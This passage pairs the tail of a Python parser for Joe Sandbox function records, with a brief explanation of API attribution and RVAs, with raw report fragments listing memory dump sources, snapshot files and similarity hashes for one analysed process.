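        """Sanity check: on this page every record's Opcode ID equals its Opcode Fuzzy Hash."""
        return self.similarity.get("Opcode ID") == self.similarity.get("Opcode Fuzzy Hash")


def parse_record(text: str) -> FunctionRecord:
    rec = FunctionRecord()
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            section = line          # a heading switches how the following "•" items are read
            continue
        if not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                rec.apis.append(ApiRef(m["fn"], m["mod"], int(m["ref"], 16),
                                       int(m["sub"], 16) if m["sub"] else None, m["args"]))
        elif section == "Memory Dump Source":
            d = DUMP_RE.search(body)
            if d and body.startswith("Source File:"):
                rec.source_dump = d["name"]
                rec.process_index = int(d["name"].split(".")[0])
                o = OFFSET_RE.search(body)
                if o:
                    rec.base = int(o["base"], 16)
            elif d and body.startswith("Associated:"):
                rec.associated.append(d["name"])
        elif section == "Joe Sandbox IDA Plugin" and body.startswith("Snapshot File:"):
            rec.snapshot = body.split(":", 1)[1].strip()
        elif section == "Similarity":
            key, _, value = body.partition(":")
            rec.similarity[key.strip()] = value.strip()
    return rec


if __name__ == "__main__":
    rec = parse_record(SAMPLE_RECORD)
    print(f"process {rec.process_index}, base {rec.base:#x}, opcode id {rec.similarity['Opcode ID'][:16]}...")
    for a in rec.apis:
        print(f"  {a.function:<16} {a.module:<40} ref {a.ref:#x} rva {rec.rva(a.ref):#x}"
              + (f"  (via subcall {a.subcall_of:#x})" if a.subcall_of else ""))
```

The `direct_apis()` list leaves out the "Part of subcall function" entries because the report attributes those to the callee (here the `wcschr` call inside 00007FF6A0E81EA0), so counting them for this function would double-attribute them. The RVAs (`0x5A2E` for the `CreateFileW` call site, `0x237AA` for `GetLastError`) are what to navigate to once the dumped image is loaded with the base the report gives, and the Opcode ID is the value to compare when checking whether the same function appears in another report's listing.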
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
                                                                                          Similarity
                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                          • String ID:
                                                                                          • API String ID: 140117192-0
                                                                                          • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                          • Instruction ID: de7341eaff294e0fa4b986d100db65a47f8d58b4a410fc43f059cbba3fc9c882
                                                                                          • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                          • Instruction Fuzzy Hash: CC21A23591EB46A6EB408B04F8843A977B4FB89755F600035EA8EC2764DF7DE448D710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
                                                                                           • Associated: 00000006.00000002.1415044988.00007FF6A0E70000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415146997.00007FF6A0EA2000.00000002.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EAD000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EB1000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EBF000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415252805.00007FF6A0EC4000.00000004.00000001.01000000.00000004.sdmp
                                                                                           • Associated: 00000006.00000002.1415344529.00007FF6A0EC9000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID: ConsoleMode_get_osfhandle
• String ID:
• API String ID: 1606018815-0
Strings
Memory Dump Source
• Source File: 00000006.00000002.1415065593.00007FF6A0E71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6A0E70000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6a0e70000_alpha.jbxd
Similarity
• API ID:
• String ID: 3$3
• API String ID: 0-2538865259